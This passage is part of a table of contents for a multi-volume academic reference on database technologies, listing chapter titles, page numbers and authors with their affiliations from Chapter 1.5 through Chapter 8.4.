Chapter 1.5. Pattern Mining and Clustering on Image Databases ........................................................ 60 Marinette Bouet, LIMOS, Blaise Pascal University-Clermont-Ferrand, France Pierre Gançarski, LSIIT-AFD-Louis Pasteur University, France Marie-Aude Aufaure, Supélec—INRIA, France Omar Boussaïd, University LUMIERE Lyon, France Chapter 1.6. Conceptual Modeling Solutions for the Data Warehouse ................................................ 86 Stefano Rizzi, DEIS-University of Bologna, Italy Chapter 1.7. A Literature Overview of Fuzzy Database Modeling..................................................... 105 Z. M. Ma, Northeastern University, China Chapter 1.8. Fuzzy and Probabilistic Object-Oriented Databases...................................................... 126 Tru H. Cao, Ho Chi Minh City University of Technology, Vietnam Chapter 1.9. An Overview of Fuzzy Approaches to Flexible Database Querying ............................. 135 Slawomir Zadrożny, Polish Academy of Sciences, Poland Guy de Tré, Ghent University, Belgium Rita de Caluwe, Ghent University, Belgium Janusz Kacprzyk, Polish Academy of Sciences, Poland Chapter 1.10. Distributed Data Mining............................................................................................... 157 Grigorios Tsoumakas, Aristotle University of Thessaloniki, Greece Ioannis Vlahavas, Aristotle University of Thessaloniki, Greece Chapter 1.11. Histogram-Based Compression of Databases and Data Cubes .................................... 165 Alfredo Cuzzocrea, University of Calabria, Italy Chapter 1.12. Emergence Index in Image Databases.......................................................................... 179 Sagarmay Deb, Southern Cross University, Australia Chapter 1.13. Secure Knowledge Discovery in Databases................................................................. 186 Rick L. Wilson, Oklahoma State University, USA Peter A. Rosen, University of Evansville, USA Mohammad Saad Al-Ahmadi, Oklahoma State University, USA Chapter 1.14. Indexing Textual Information....................................................................................... 196 Ioannis N. Kouris, University of Patras, Greece Christos Makris, University of Patras, Greece Evangelos Theodoridis, University of Patras, Greece Athanasios Tsakalidis, University of Patras, Greece Chapter 1.15. Database in Computing Systems.................................................................................. 205 W. Brett McKenzie, Roger Williams University, USA
Chapter 1.16. Database Integrity Checking ........................................................................................ 212 Hendrik Decker, Universidad Politécnica de Valencia, Spain Davide Martinenghi, Free University of Bozen/Bolzano, Italy Chapter 1.17. A Survey on Temporal Data Warehousing ................................................................... 221 Matteo Golfarelli, DEIS–University of Bologna, Italy Stefano Rizzi, DEIS–University of Bologna, Italy Chapter 1.18. Discovering Quality Knowledge from Relational Databases ...................................... 238 M. Mehdi Owrang O., American University, USA Chapter 1.19. Approaches to Semantics in Knowledge Management ................................................ 257 Cristiano Fugazza, University of Milan, Italy Stefano David, Polytechnic University of Marche, Italy Anna Montesanto, Polytechnic University of Marche, Italy Cesare Rocchi, Polytechnic University of Marche, Italy Chapter 1.20. Theories of Meaning in Schema Matching: A Review................................................. 282 Joerg Evermann, Memorial University of Newfoundland - St. John’s, Canada Chapter 1.21. Multi-Label Classification: An Overview .................................................................... 309 Grigorios Tsoumakas, Aristotle University of Thessaloniki, Greece Ioannis Katakis, Aristotle University of Thessaloniki, Greece Chapter 1.22. Electronic Usage Statistics ........................................................................................... 320 Patricia Hults, Rensselaer Polytechnic Institute, USA Chapter 1.23. Databases Modeling of Engineering Information ........................................................ 338 Z. M. Ma, Northeastern University, China Chapter 1.24. An Overview of Learning Object Repositories ............................................................ 362 Agiris Tzikopoulos, Agricultural University of Athens, Greece Nikos Manouselis, Agricultural University of Athens, Greece Riina Vuorikari, European Schoolnet, Belgium Chapter 1.25. An Overview of IDS Using Anomaly Detection.......................................................... 384 Lior Rokach, Ben-Gurion University of the Negev, Israel Yuval Elovici, Ben-Gurion University of the Negev, Israel Chapter 1.26. Towards Google Earth: A History of Earth Geography ............................................... 395 Hatem F. Halaoui, Haigazian University, Lebanon
Section II. Development and Design Methodologies This section provides in-depth coverage of conceptual architectures, frameworks and methodologies related to the design and implementation of database technologies. Throughout these contributions, research fundamentals in the discipline are presented and discussed. From broad examinations to specific discussions on particular frameworks and infrastructures, the research found within this section spans the discipline while also offering detailed, specific discussions. Basic designs, as well as abstract developments, are explained within these chapters, and frameworks for designing successful databases are discussed. Chapter 2.1. Design of a Data Model for Social Network Applications............................................. 414 Susanta Mitra, International Institute of Information Technology, India Aditya Bagchi, Indian Statistical Institute, India A.K.Bandyopadhyay, Jadavpur University, India Chapter 2.2. Database Design Based on B ......................................................................................... 440 Elvira Locuratolo, ISTI, Consiglio Nazionale delle Ricerche, Italy Chapter 2.3. A Database Service Discovery Model for Mobile Agents.............................................. 457 Lei Song, University of Guelph, Guelph, Canada Xining Li, University of Guelph, Guelph, Canada Jingbo Ni, University of Guelph, Guelph, Canada Chapter 2.4. A Database Project in a Small Company (or How the Real World Doesn’t Always Follow the Book) ................................................................................................................................ 468 Efrem Mallach, University of Massachusetts, Dartmouth, USA Chapter 2.5. Integrating Mobile-Based Systems with Healthcare Databases..................................... 484 Yu Jiao, Oak Ridge National Laboratory, USA Ali R. Hurson, Pennsylvania State University, USA Thomas E. Potok, Oak Ridge National Laboratory, USA Barbara G. Beckerman, Oak Ridge National Laboratory, USA Chapter 2.6. A Framework for Efficient Association Rule Mining in XML Data .............................. 505 Ji Zhang, University of Toronto, Canada Han Liu, Carnegie Mellon University, USA Tok Wang Ling, National University of Singapore, Singapore Robert M. Bruckner, Microsoft, USA A Min Tjoa, Vienna University of Technology, Austria Chapter 2.7. Conceptual Modeling for XML: A Myth or a Reality.................................................... 527 Sriram Mohan, Indiana University, USA Arijit Sengupta, Wright State University, USA
Chapter 2.8. Semantic Integrity Constraint Checking for Multiple XML Databases......................... 550 Praveen Madiraju, Marquette University, USA Rajshekhar Sunderraman, Georgia State University, USA Shamkant B. Navathe, Georgia Institute of Technology, USA Haibin Wang, Emory University, USA Chapter 2.9. Goal-Oriented Requirement Engineering for XML Document Warehouses ................. 570 Vicky Nassis, La Trobe University, Melbourne, Australia Tharam S. Dillon, University of Technology, Sydney, Australia Wenny Rahayu, La Trobe University, Australia R. Rajugan, University of Technology, Sydney, Australia Chapter 2.10. Mediating RDF/S Queries to Relational and XML Sources ........................................ 596 I. Koffina, Institute of Computer Science & University of Crete, Greece G. Serfiotis, Institute of Computer Science & University of Crete, Greece V. Christophides, Institute of Computer Science & University of Crete, Greece V. Tannen, University of Pennsylvania, USA Chapter 2.11. A Methodology Supporting the Design and Evaluating the Final Quality of Data Warehouses ............................................................................................................................ 615 Maurizio Pighin, University of Udine, Italy Lucio Ieronutti, University of Udine, Italy Chapter 2.12. An MDA Compliant Approach for Designing Secure Data Warehouses ..................... 637 Rodolfo Villarroel, Universidad Católica del Maule, Chile Eduardo Fernández-Medina, Universidad de Castilla-La Mancha, Spain Juan Trujillo, Universidad de Alicante, Spain Mario Piattini, Universidad de Castilla-La Mancha, Spain Chapter 2.13. Architecture for Symbolic Object Warehouse.............................................................. 648 Sandra Elizabeth González Císaro, Universidad Nacional del Centro de la Provincia de Buenos Aires, Argentina Héctor Oscar Nigro, Universidad Nacional del Centro de la Provincia de Buenos Aires, Argentina Chapter 2.14. Efficient and Robust Node-Partitioned Data Warehouses............................................ 658 Pedro Furtado, Universidade de Coimbra, Portugal
Volume II Chapter 2.15. Web Data Warehousing Convergence: From Schematic to Systematic ....................... 678 D. Xuan Le, La Trobe University, Australia J. Wenny Rahayu, La Trobe University, Australia David Taniar, Monash University, Australia
Chapter 2.16. Data Warehouse Design to Support Customer Relationship Management Analysis......................................................................................................................... 702 Colleen Cunningham, Drexel University, USA Il-Yeol Song, Drexel University, USA Peter P. Chen, Louisiana State University, USA Chapter 2.17. Aspects of Intelligence in an “SP” Database System................................................... 725 J. Gerard Wolff, CognitionResearch.org.uk, UK Chapter 2.18. Intelligent Search for Experts Using Fuzzy Abstraction Hierarchy in Knowledge Management Systems.................................................................................................. 755 Kun-Woo Yang, Keimyung University, South Korea Soon-Young Huh, KAIST Business School, South Korea Chapter 2.19. Building an Environmental GIS Knowledge Infrastructure......................................... 778 Inya Nlenanya, Iowa State University, USA Chapter 2.20. Bug Fixing Practices within Free/Libre Open Source Software Development Teams.... 797 Kevin Crowston, Syracuse University, USA Barbara Scozzi, Politecnico di Bari, Italy Chapter 2.21. OLAP with a Database Cluster .................................................................................... 829 Uwe Röhm, University of Sydney, Australia Chapter 2.22. Extraction, Transformation, and Loading Processes.................................................... 847 Jovanka Adzic, Telecom Italia, Italy Valter Fiore, Telecom Italia, Italy Luisella Sisto, Telecom Italia, Italy Chapter 2.23. Designing Information Systems Capabilities to Create Business Value: A Theoretical Conceptualization of the Role of Flexibility and Integration....................................... 866 Christoph Schlueter Langdon, University of Southern California, USA Section III. Tools and Technologies This section presents extensive coverage of the technology that both derives from and informs databases. These chapters provide an in-depth analysis of the use and development of innumerable devices and tools, while also providing insight into new and upcoming technologies, theories, and instruments that will soon be commonplace. Within these rigorously researched chapters, readers are presented with examples of database technology. In addition, the successful implementation and resulting impact of these various technologies are discussed within this collection of chapters. Chapter 3.1. Open Source Database Technologies ............................................................................. 887 Emmanuel Udoh, Purdue University, USA Chapter 3.2. Action Research with Internet Database Tools............................................................... 894 Bruce L. Mann, Memorial University, Canada
Chapter 3.3. A Scalable Middleware for Web Databases.................................................................... 903 Athman Bouguettaya, Virginia Tech, USA Zaki Malik, Virginia Tech, USA Abdelmounaam Rezgui, Virginia Tech, USA Lori Korff, Virginia Tech, USA Chapter 3.4. Full-Text Search Engines for Databases ........................................................................ 931 László Kovács, University of Miskolc, Hungary Domonkos Tikk, Budapest University of Technology and Economics, Hungary Chapter 3.5. Application of Decision Tree as a Data mining Tool in a Manufacturing System......... 940 S. A. Oke, University of Lagos, Nigeria Chapter 3.6. Alliance Project: Digital Kinship Database and Genealogy........................................... 956 Shigenobu Sugito, Sugiyama University, Japan Sachiko Kubota, Hiroshima University, Japan Chapter 3.7. Constraint-Based Multi-Dimensional Databases ........................................................... 961 Franck Ravat, Université Toulouse I, France Olivier Teste, Université Toulouse III, France Gilles Zurfluh, Université Toulouse I, France Chapter 3.8. Towards a Visual Query System for Spatio-Temporal Databases.................................. 987 Valéria M. B. Cavalcanti, Federal University of Campina Grande, Brazil Ulrich Schiel, Federal University of Campina Grande, Brazil Claudio de Souza Baptista, Federal University of Campina Grande, Brazil Chapter 3.9. Visual Query Languages, Representation Techniques and Data Models ..................... 1003 Maria Chiara Caschera, IRPPS-CNR, Italy Arianna D’Ulizia, IRPPS-CNR, Italy Leonardo Tininini, IASI-CNR, Italy Chapter 3.10. A Formal Verification and Validation Approach for Real-Time Databases................ 1020 Pedro Fernandes Ribeiro Neto, Universidade do Estado do Rio Grande do Norte, Brazil Maria Lígia Barbosa Perkusich, Universidade Católica de Pernambuco, Brazil Hyggo Oliveira de Almeida, Federal University of Campina Grande, Brazil Angelo Perkusich, Federal University of Campina Grande, Brazil Chapter 3.11. Protoforms of Linguistic Database Summaries as a Human Consistent Tool for Using Natural Language in Data Mining .................................................................................... 1038 Janusz Kacprzyk, Polish Academy of Sciences, Poland Sławomir Zadrożny, Polish Academy of Sciences, Poland Chapter 3.12. Rapid Privacy Preserving Algorithm for Large Databases ........................................ 1050 K. Anbumani, Karunya Institute of Technology and Sciences (Deemed University), India R. Nedunchezhian, Sri Ramakrishna Engineering College, India
Chapter 3.13. A Content-Based Approach to Medical Image Database Retrieval............................ 1062 Chia-Hung Wei, University of Warwick, UK Chang-Tsun Li, University of Warwick, UK Roland Wilson, University of Warwick, UK Chapter 3.14. High Speed Optical Higher Order Neural Networks for Discovering Data Trends and Patterns in Very Large Databases .......................................................................... 1084 David R. Selviah, University College London, UK Chapter 3.15. Mobile Information Processing Involving Multiple Non-Collaborative Sources...... 1108 Say Ying Lim, Monash University, Australia David Taniar, Monash University, Australia Bala Srinivasan, Monash University, Australia Chapter 3.16. Rough Sets: A Versatile Theory for Approaches to Uncertainty Management in Databases ...................................................................................................................................... 1127 Theresa Beaubouef, Southeastern Louisiana University, USA Frederick E. Petry, Naval Research Laboratory, USA Chapter 3.17. VRMiner: A Tool for Multimedia Database Mining With Virtual Reality................. 1151 H. Azzag, Université François-Rabelais de Tours, Laboratoire d‘Informatique (EA 2101), France F. Picarougne, Université François-Rabelais de Tours, Laboratoire d‘Informatique (EA 2101), France C. Guinot, CE.R.I.E.S., Unité Biométrie et Epidémiologie, and Université François-Rabelais de Tours, Laboratoire d‘Informatique (EA 2101), France G. Venturini, Université François-Rabelais de Tours, Laboratoire d‘Informatique (EA 2101), France Chapter 3.18. UB2SQL: A Tool for Building Database Applications Using UML and B Formal Method ....................................................................................................................... 1168 Amel Mammar, University of Luxembourg, Luxembourg Régine Laleau, University of Paris 12, France Chapter 3.19. MMIR: An Advanced Content-Based Image Retrieval System Using a Hierarchical Learning Framework ................................................................................................. 1189 Min Chen, Florida International University, USA Shu-Ching Chen, Florida International University, USA Chapter 3.20. MILPRIT*: A Constraint-Based Algorithm for Mining Temporal Relational Patterns ............................................................................................................................ 1205 Sandra de Amo, Universidade Federal de Uberlândia, Brazil Waldecir P. Junior, Universidade Federal de Uberlândia, Brazil Arnaud Giacometti, Université François Rabelais de Tours, France
Chapter 3.21. Database Benchmarks ................................................................................................ 1226 Jérôme Darmont, ERIC, University of Lyon 2, France Section IV. Utilization and Application This section introduces and discusses the ways in which information technology has been used to shape the realm of database technology and proposes new ways in which IT-related innovations can be implemented within organizations and in society as a whole. These particular selections highlight, among other topics, the implementation of mobile databases and database-driven portals. Contributions included in this section provide excellent coverage of today’s environment and insight into how database technology impacts the fabric of our present-day global village. Chapter 4.1. A Taxonomy of Database Operations on Mobile Devices ........................................... 1235 Say Ying Lim, Monash University, Australia David Taniar, Monash University, Australia Bala Srinivasan, Monash University, Australia Chapter 4.2. Transaction Management in Mobile Databases ........................................................... 1257 Ziyad Tariq Abdul-Mehdi, Multimedia University, Malaysia Ali Bin Mamat, Universiti Putra Malaysia, Malaysia Hamidah Ibrahim, Universiti Putra Malaysia, Malaysia Mustafa M. Dirs, College University Technology Tun Hussein Onn, Malaysia Chapter 4.3. Bioinformatics Web Portals.......................................................................................... 1267 Mario Cannataro, Università “Magna Græcia” di Catanzaro, Italy Pierangelo Veltri, Università “Magna Græcia” di Catanzaro, Italy Chapter 4.4. Large-Scale ASP Replication of Database-Driven Portals........................................... 1276 Christopher B. Mayer, Air Force Institute of Technology, USA K. Selçuk Candan, Arizona State University, USA Chapter 4.5. A Case Study of an Integrated University Portal.......................................................... 1285 Tracy R. Stewart, Regent University, USA Jason D. Baker, Regent University, USA Chapter 4.6. Electronic Tools for Online Assessments: An Illustrative Case Study from Teacher Education .................................................................................................................... 1291 Jon Margerum-Leys, Eastern Michigan University, USA Kristin M. Bass, University of California, Berkeley, USA Chapter 4.7. Assessment of Students by a Teacher with a Hand Held Device and a Networkable Database............................................................................................................. 1309 C. Paul Newhouse, Edith Cowan University, Australia
Chapter 4.8. An XML-Based Database for Knowledge Discovery: Definition and Implementation .......................................................................................................................... 1320 Rosa Meo, Università di Torino, Italy Giuseppe Psaila, Università di Bergamo, Italy Chapter 4.9. A Prehospital Database System for Emergency Medical Services............................... 1344 Nada Hashmi, 10Blade, Inc., USA Mark Gaynor, Boston University School of Management, USA Marissa Pepe, Boston University School of Management, USA Matt Welsh, Harvard University, USA William W. Tollefsen, Boston University School of Medicine, USA Steven Moulton, Boston University School of Medicine, USA Dan Myung, 10Blade, Inc., USA
Volume III Chapter 4.10. A Preliminary Study Toward Wireless Integration of Patient Information System ... 1357 Abdul-Rahman Al-Ali, American University of Sharjah, UAE Tarik Ozkul, American University of Sharjah, UAE Taha Landolsi, American University of Sharjah, UAE Chapter 4.11. A Web-Based Application to Exchange Electronic Health Records and Medical Images in Ophthalmology............................................................................................ 1372 Isabel de la Torre Díez, University of Valladolid, Spain Roberto Hornero Sánchez, University of Valladolid, Spain Miguel López Coronado, University of Valladolid, Spain Jesús Poza Crespo, University of Valladolid, Spain María Isabel López Gálvez, University of Valladolid, Spain Chapter 4.12. Implementation of a Computerized System in an Oncology Unit ............................. 1385 Taxiarchis Botsis, Athens Medical School, Greece Konstantinos Syrigos, Athens Medical School, Greece Chapter 4.13. Challenges in Data Mining on Medical Databases .................................................... 1393 Fatemeh Hosseinkhah, Howard University Hospital, USA Hassan Ashktorab, Howard University Hospital, USA Ranjit Veen, American University, USA M. Mehdi Owrang O., American University, USA Chapter 4.14. Beyond OpenURL: Technologies for Linking Library Resources............................. 1405 George Boston, Western Michigan University, USA Randle J. Gedeon, Western Michigan University, USA Chapter 4.15. Databases for Multiple Archaeological Excavations and Internet Applications ........ 1420 Athanasios Karamalis, Computer Scientist and Researcher, Germany
Chapter 4.16. Collaborative Information Management System for Science Domains..................... 1446 Ozgul Unal, University of Amsterdam, The Netherlands Ersin C. Kaletas, University of Amsterdam, The Netherlands Hamideh Afsarmanesh, University of Amsterdam, The Netherlands H. Hakan Yakali, University of Amsterdam, The Netherlands Louis O. Hertzberger, University of Amsterdam, The Netherlands Chapter 4.17. Computer Networking of Cybercafés in Delta State, Nigeria.................................... 1454 Oghenevwogaga Benson Adogbeji, Delta State University, Abraka, Nigeria Esharenana E. Adomi, Delta State University, Abraka, Nigeria Chapter 4.18. Ara Irititja: Towards Culturally Appropriate IT Best Practice in Remote Indigenous Australia........................................................................................................ 1462 Martin Hughes, Smart Works, Australia John Dallwitz, Ara Irititja, Pitjantjatjara Council Inc., Australia Chapter 4.19. Agreements Treaties and Negotiated Settlements Database ...................................... 1472 Marcia Langton, The University of Melbourne, Australia Odette Mazel, The University of Melbourne, Australia Lisa Palmer, The University of Melbourne, Australia Chapter 4.20. From ‘Flow’ to ‘Database’: A Comparative Study of the Uses of Traditional and Internet Television in Estonia.............................................................................. 1477 Ravio Suni, University of Tartu, Estonia Chapter 4.21. Innovative Technological Paradigms for Corporate Offshoring ................................ 1490 Tapasya Patki, GGSIP University, India A. B. Patki, Department of Information Technology, India Chapter 4.22. Out of Control? The Real ID Act of 2005 .................................................................. 1511 Todd Loendorf, North Carolina State University, USA Chapter 4.23. Factors Influencing the Lifetime of Telecommunication and Information Technology Standards: Results of an Explorative Analysis of the PERINORM Database .............. 1529 Knut Blind, Fraunhofer Institute for Systems and Innovation Research & Berlin University of Technology, Germany Chapter 4.24. Image Mining: A Case for Clustering Shoe prints ..................................................... 1552 Wei Sun, Monash University, Australia David Taniar, Monash University, Australia Torab Torabi, La Trobe University, Australia Chapter 4.25. A Data Visualization and Interpretation System for Sensor Networks ...................... 1568 Fengxian Fan, Kunming University, China Chapter 4.26. Enhancing UML Models: A Domain Analysis Approach .......................................... 1581 Iris Reinhartz-Berger, University of Haifa, Israel Arnon Sturm, Ben-Gurion University of the Negev, Israel
Section V. Organizational and Social Implications This section includes a wide range of research pertaining to the social and organizational impact of database technology around the world. Chapters in this section analyze online databases, data security, and organizational decision support. The inquiries and methods presented in this section offer insight into the implications of database technology at both a personal and organizational level, while also emphasizing potential areas of study within the discipline. Chapter 5.1. A Knowledge Integration Approach for Organizational Decision Support.................. 1604 Kee-Young Kwahk, Kookmin University, Korea Hee-Woong Kim, National University of Singapore, Singapore Hock Chuan Chan, National University of Singapore, Singapore Chapter 5.2. The Knowledge Transfer Process: From Field Studies to Technology Development ..................................................................................................................................... 1622 M. Millie Kwan, University of Hong Kong, Pokfulam, Hong Kong Pak-Keung Cheung, University of Hong Kong, Pokfulam, Hong Kong Chapter 5.3. The Critical Role of Information Processing in Creating an Effective Knowledge Organization ................................................................................................................. 1638 William R. King, University of Pittsburgh, USA Chapter 5.4. Interesting Knowledge Patterns in Databases .............................................................. 1652 Rajesh Natarajan, Indian Institute of Management Lucknow (IIML), India B. Shekar, Indian Institute of Management Bangalore (IIMB), India Chapter 5.5. Fine-Grained Data Security in Virtual Organizations .................................................. 1663 Harith Indraratne, Budapest University of Technology and Economics, Hungary Gábor Hosszú, Budapest University of Technology and Economics, Hungary Chapter 5.6. Knowledge Communication with Shared Databases ................................................... 1670 Joachim Kimmerle, University of Tuebingen, Germany Ulrike Cress, Knowledge Media Research Center, Germany Chapter 5.7. Economic Development: Government’s Cutting Edge in IT ....................................... 1682 Gerald A. Merwin Jr., Valdosta State University, USA J. Scott McDonald, University of Texas El Paso, USA Levy C. Odera, University of Florida, USA Chapter 5.8. A Comprehensive Framework Towards Information Sharing Between Government Agencies....................................................................................................................... 1723 Akhilesh Bajaj, The University of Tulsa, USA Sudha Ram, The University of Arizona, USA Chapter 5.9. A GIS-Based Interactive Database System for Planning Purposes .............................. 1741 Nedal Al-Hanbali, Al-Balqa’ Applied University, Jordan Balqies Sadoun, Al-Balqa’ Applied University, Jordan
Chapter 5.10. Categorizing Post-Deployment IT Changes: An Empirical Investigation ................. 1756 David Kang, Chapman University, USA Chapter 5.11. Customer Relationship Management and Knowledge Discovery in Database.......... 1778 Jounghae Bang, Kookmin University, Korea Nikhilesh Dholakia, University of Rhode Island, USA Lutz Hamel, University of Rhode Island, USA Seung-Kyoon Shin, University of Rhode Island, USA Chapter 5.12. Customer Investigation Process at Credit Suisse: Meeting the Rising Demands of Regulators ......................................................................................................... 1787 Daniel Maier, Credit Suisse, Switzerland Thomas Muegeli, Credit Suisse, Switzerland Andrea Krejza, Credit Suisse, Switzerland Chapter 5.13. Metaphors and Models for Data Mining Ethics ......................................................... 1808 Peter Danielson, University of British Columbia, Canada Chapter 5.14. Reconciling Information Privacy and Information Access in a Globalized Technology Society ........................................................................................................ 1823 George T. Duncan, Carnegie Mellon University, USA Stephen F. Roehrig, Carnegie Mellon University, USA Chapter 5.15. Context-Aware Query Processing in Ad-Hoc Environments of Peers ....................... 1844 Nikolaos Folinas, University of Ioannina, Greece Panos Vassiliadis, University of Ioannina, Greece Evaggelia Pitoura, University of Ioannina, Greece Evangelos Papapetrou, University of Ioannina, Greece Apostolos Zarras, University of Ioannina, Greece Chapter 5.16. Misuse of Online Databases for Literature Searches ................................................. 1867 Robert A. Bartsch, University of Houston - Clear Lake, USA Section VI. Managerial Impact This section presents contemporary coverage of the managerial implications of database technology. Particular contributions address e-services, database grids, and project databases. The managerial research provided in this section allows executives, practitioners, and researchers to gain a better sense of how database technology can inform their practices and behavior. Chapter 6.1. Conflicts, Compromises, and Political Decisions: Methodological Challenges of Enterprise-Wide E-Business Architecture Creation................................................... 1876 Kari Smolander, Lappeenranta University of Technology, Finland Matti Rossi, Helsinki School of Economics, Finland
Chapter 6.2. Database High Availability: An Extended Survey ....................................................... 1899 Moh’d A. Radaideh, Abu Dhabi Police – Ministry of Interior, United Arab Emirates Hayder Al-Ameed, United Arab Emirates University, United Arab Emirates Chapter 6.3. Database Integration in the Grid Infrastructure............................................................ 1928 Emmanuel Udoh, Indiana University – Purdue University, USA Chapter 6.4. Empirical Assessment of Factors Influencing Success of Enterprise Resource Planning Implementations................................................................................................. 1936 Fiona Fui-Hoon Nah, University of Nebraska-Lincoln, USA Zahidul Islam, Independent University, Bangladesh Mathew Tan, Agilent Technologies, Malaysia Chapter 6.5. Business Information Integration from XML and Relational Databases Sources ....... 1959 Ana María Fermoso Garcia, Pontifical University of Salamanca, Spain Roberto Berjón Gallinas, Pontifical University of Salamanca, Spain Chapter 6.6. A Parallel Methodology for Reduction of Coupling in Distributed Business-to-Business E-Commerce Transactions............................................................................. 1984 Anthony Mark Orme, Athens State University, USA Letha H. Etzkorn, University of Alabama, USA Chapter 6.7. A Two-Stage Zone Regression Method for Global Characterization of a Project Database ........................................................................................................................ 2000 J. J. Dolado, University of the Basque Country, Spain D. Rodríguez, University of Reading, UK J. Riquelme, University of Seville, Spain F. Ferrer-Troyano, University of Seville, Spain J. J. Cuadrado, University of Alcalá de Henares, Spain
Volume IV Section VII. Critical Issues This section addresses conceptual and theoretical issues related to the field of database technology, which include security issues in numerous facets of the discipline, including security within medical and web-powered databases. Within these chapters, the reader is presented with an analysis of the most current and relevant conceptual inquiries within this growing field of study. Particular chapters also address quality of service issues in information quality, data cleaning, and data classification. Overall, contributions within this section ask unique, often theoretical questions related to the study of database technology and, more often than not, conclude that solutions are both numerous and contradictory. Chapter 7.1. NetCube: Fast, Approximate Database Queries Using Bayesian Networks ................ 2011 Dimitris Margaritis, Iowa State University, USA Christos Faloutsos, Carnegie Mellon University, USA Sebastian Thrun, Stanford University, USA
Chapter 7.2. Approximate Range Querying over Sliding Windows................................................. 2037 Francesco Buccafurri, University “Mediterranea” of Reggio Calabria, Italy Gianluca Caminiti, University “Mediterranea” of Reggio Calabria, Italy Gianluca Lax, University “Mediterranea” of Reggio Calabria, Italy Chapter 7.3. Consistent Queries over Databases with Integrity Constraints .................................... 2051 Luciano Caroprese, DEIS Universitá della Calabria, Italy Cristian Molinaro, DEIS Universitá della Calabria, Italy Irina Trubitsyna, DEIS Universitá della Calabria, Italy Ester Zumpano, DEIS Universitá della Calabria, Italy Chapter 7.4. A Deterministic Approach to XML Query Processing with Efficient Support for Pure and Negated Containments ................................................................................................. 2059 Dunren Che, Illinois University at Carbondale, USA Chapter 7.5. Countermeasures for Protecting Legally Sensitive Web-Powered Databases and Web Portals ................................................................................................................................ 2079 Theodoros Evdoridis, University of the Aegean, Greece Theodoros Tzouramanis, University of the Aegean, Greece Chapter 7.6. Compiling Medical Data into National Medical Databases: Legitimate Practice or Data Protection Concern?............................................................................. 2085 Boštjan Berčič, Institute for Economics, Law and Informatics, Ljubljana, Slovenia Carlisle George, Middlesex University, UK Chapter 7.7. Database Security and Statistical Database Security ................................................... 2100 Edgar R. Weippl, Secure Business Austria, Austria Chapter 7.8. Security Threats in Web-Powered Databases and Web Portals.................................... 2109 Theodoros Evdoridis, University of the Aegean, Greece Theodoros Tzouramanis, University of the Aegean, Greece Chapter 7.9. SQL Code Poisoning: The Most Prevalent Technique for Attacking Web Powered Databases ................................................................................................................... 2118 Theodoros Tzouramanis, University of the Aegean, Greece Chapter 7.10. Sanitization and Anonymization of Document Repositories ..................................... 2129 Yücel Saygin, Sabanci University, Turkey Dilek Hakkani-Tür, AT&T Labs—Research, USA Gökhan Tür, AT&T Labs—Research, USA Chapter 7.11. Information Quality: How Good are Off-the-shelf DBMs? ....................................... 2140 Felix Naumann, Humboldt-Universität zu Berlin, Germany Mary Roth, IBM Silicon Valley Lab, USA
Chapter 7.12. Handling Fuzzy Similarity for Data Classification .................................................... 2157 Roy Gelbard, Bar-Ilan University, Israel Avichai Meged, Bar-Ilan University, Israel Chapter 7.13. Fabric Database and Fuzzy Logic Models for Evaluating Fabric Performance ........ 2166 Yan Chen, Louisiana State University Agricultural Center, USA Graham H. Rong, Massachusetts Institute of Technology, USA Jianhua Chen, Louisiana State University, USA Chapter 7.14. Mining for Mutually Exclusive Items in Transaction Databases ............................... 2192 George Tzanis, Aristotle University of Thessaloniki, Greece Christos Berberidis, Aristotle University of Thessaloniki, Greece Chapter 7.15. Ensuring Correctness, Completeness, and Freshness for Outsourced Tree-Indexed Data.................................................................................................... 2204 Tran Khanh Dang, National University of Ho Chi Minh City, Vietnam Chapter 7.16. A Multiple-Bits Watermark for Relational Data......................................................... 2223 Yingjiu Li, Singapore Management University, Singapore Huiping Guo, California State University at Los Angeles, USA Shuhong Wang, University of Wollongong, Australia Chapter 7.17. A Machine Learning Approach to Data Cleaning in Databases and Data Warehouses ........................................................................................................................ 2245 Hamid Haidarian Shahri, University of Maryland, USA Chapter 7.18. A Roadmap on Updates .............................................................................................. 2261 Fernando Zacarías Flores, Benemérita Universidad Autónoma de Puebla, Mexico Dionicio Zacarías Flores, Benemérita Universidad Autónoma de Puebla, Mexico Rosalba Cuapa Canto, Benemérita Universidad Autónoma de Puebla, Mexico Luis Miguel Guzmán Muñoz, Benemérita Universidad Autónoma de Puebla, Mexico Chapter 7.19. Association Rule Hiding Methods.............................................................................. 2268 Vassilios S. Verykios, University of Thessaly, Greece Chapter 7.20. Managing Uncertainties in Image Databases ............................................................. 2275 Antonio Picariello, University of Napoli, Italy Maria Luisa Sapino, University of Torino, Italy Chapter 7.21. Bitmap Join Indexes vs. Data Partitioning ................................................................. 2292 Ladjel Bellatreche, Poitiers University, France Chapter 7.22. Integrating Projects from Multiple Open Source Code Forges.................................. 2301 Megan Squire, Elon University, USA
Chapter 7.23. Extended Action Rule Discovery Based on Single Classification Rules and Reducts....................................................................................................................................... 2313 Zbigniew W. Ras, University of North Carolina at Charlotte, USA Elzbieta M. Wyrzykowska, University of Information Technology and Management, Poland Chapter 7.24. Optimization of Multidimensional Aggregates in Data Warehouses ......................... 2324 Russel Pears, Auckland University of Technology, New Zealand Bryan Houliston, Auckland University of Technology, New Zealand Chapter 7.25. Improving Storage Concepts for Semantic Models and Ontologies .......................... 2348 Edgar R. Weippl, Vienna University of Technology, Austria Markus D. Klemen, Vienna University of Technology, Austria Stefan Raffeiner, Vienna University of Technology, Austria Section VIII. Emerging Trends This section highlights research potential within the field of database technology while exploring uncharted areas of study for the advancement of the discipline. Chapters within this section highlight evolutions in knowledge discovery, data integration, and models that inform database technology. These contributions, which conclude this exhaustive, multi-volume set, provide emerging trends and suggestions for future research within this rapidly expanding discipline. Chapter 8.1. From Databases to Ontologies ..................................................................................... 2360 Guntis Barzdins, University of Latvia, Latvia Janis Barzdins, University of Latvia, Latvia Karlis Cerans, University of Latvia, Latvia Chapter 8.2. A Measurement Ontology Generalizable for Emerging Domain Applications on the Semantic Web......................................................................................................................... 2384 Henry M. Kim, York University, Canada Arijit Sengupta, Wright State University, USA Mark S. Fox, University of Toronto, Canada Mehmet Dalkilic, Indiana University, USA Chapter 8.3. Enhancing the Process of Knowledge Discovery in Geographic Databases Using Geo-Ontologies ...................................................................................................................... 2405 Vania Bogorny, Universidade Federal do Rio Grande do Sul (UFRGS), Brazil, and Transnational University of Limburg, Belgium Paulo Martins Engel, Universidade Federal do Rio Grande do Sul (UFRGS), Brazil Luis Otavio Alavares, Universidade Federal do Rio Grande do Sul (UFRGS), Brazil Chapter 8.4. A Distributed Algorithm for Mining Fuzzy Association Rules in Traditional Databases.................................................................................................................... 2427 Wai-Ho Au, Microsoft Corporation, USA,
